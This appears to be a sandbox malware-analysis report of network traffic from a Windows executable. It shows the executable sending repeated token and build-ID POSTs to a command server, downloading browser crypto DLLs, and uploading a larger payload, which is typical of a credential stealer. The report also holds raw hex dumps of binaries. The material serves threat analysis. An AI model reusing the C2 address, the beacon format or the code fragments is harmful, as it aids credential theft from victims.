                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                                          2024-10-23 15:05:40 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49753 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:41 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:05:41 UTC | 4677 | OUT | Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------IDGHDGIDAKEBAAKFCGHCCont
2024-10-23 15:06:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:06:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49756 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:56 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:05:56 UTC | 1529 | OUT | Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------KFCBAEHCAEGDHJKFHJKFCont
2024-10-23 15:05:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:05:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49762 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:58 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:05:58 UTC | 437 | OUT | Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------FCFBAKJDBKJJKFIDBGHCCont
2024-10-23 15:05:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:05:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49772 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:00 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:00 UTC | 437 | OUT | Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------GHJDBAKEHDHDGCAKKJJECont
2024-10-23 15:06:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:06:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49782 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:02 UTC | 198 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:02 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:02 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:02 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49808 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:06 UTC | 198 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:07 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:06 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:06 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                          Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                          2024-10-23 15:06:08 UTC16384INData Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24
                                                                                                                                                                                                                          Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49833 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:11 UTC | 199 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:11 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:11 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:11 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49857 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:14 UTC | 199 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:15 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:15 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:15 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                          Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84
                                                                                                                                                                                                                          Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff
                                                                                                                                                                                                                          Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb
                                                                                                                                                                                                                          Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49874 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:18 UTC | 203 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:18 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:18 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:18 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49886 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:20 UTC | 195 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:20 UTC | 264 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:20 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:06:20 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                          Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49922 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:27 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:27 UTC | 1145 | OUT | Data Ascii:
------AKJEGCFBGDHJJJJJKJEC
Content-Disposition: form-data; name="token"

62641dabf289ea94f769f60cef180c7e
------AKJEGCFBGDHJJJJJKJEC
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------AKJEGCFBGDHJJJJJKJEC
Cont
2024-10-23 15:06:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:06:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49930 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:28 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:28 UTC | 331 | OUT | Data Ascii:
------JJJEGCGDGHCBFHIDHDAA
Content-Disposition: form-data; name="token"

62641dabf289ea94f769f60cef180c7e
------JJJEGCGDGHCBFHIDHDAA
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------JJJEGCGDGHCBFHIDHDAA
Cont
2024-10-23 15:06:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49941 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:29 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:29 UTC | 331 | OUT | Data Ascii:
------JDGCFBAFBFHJEBGCAEGH
Content-Disposition: form-data; name="token"

62641dabf289ea94f769f60cef180c7e
------JDGCFBAFBFHJEBGCAEGH
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------JDGCFBAFBFHJEBGCAEGH
Cont
2024-10-23 15:06:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49950 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:31 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:06:31 UTC | 461 | OUT | Data Ascii:
------GDAAKFIDGIEGDGDHIDAK
Content-Disposition: form-data; name="token"

62641dabf289ea94f769f60cef180c7e
------GDAAKFIDGIEGDGDHIDAK
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------GDAAKFIDGIEGDGDHIDAK
Cont
2024-10-23 15:06:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:06:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 15:06:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          22192.168.2.44996395.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:33 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 99261
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:06:33 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74
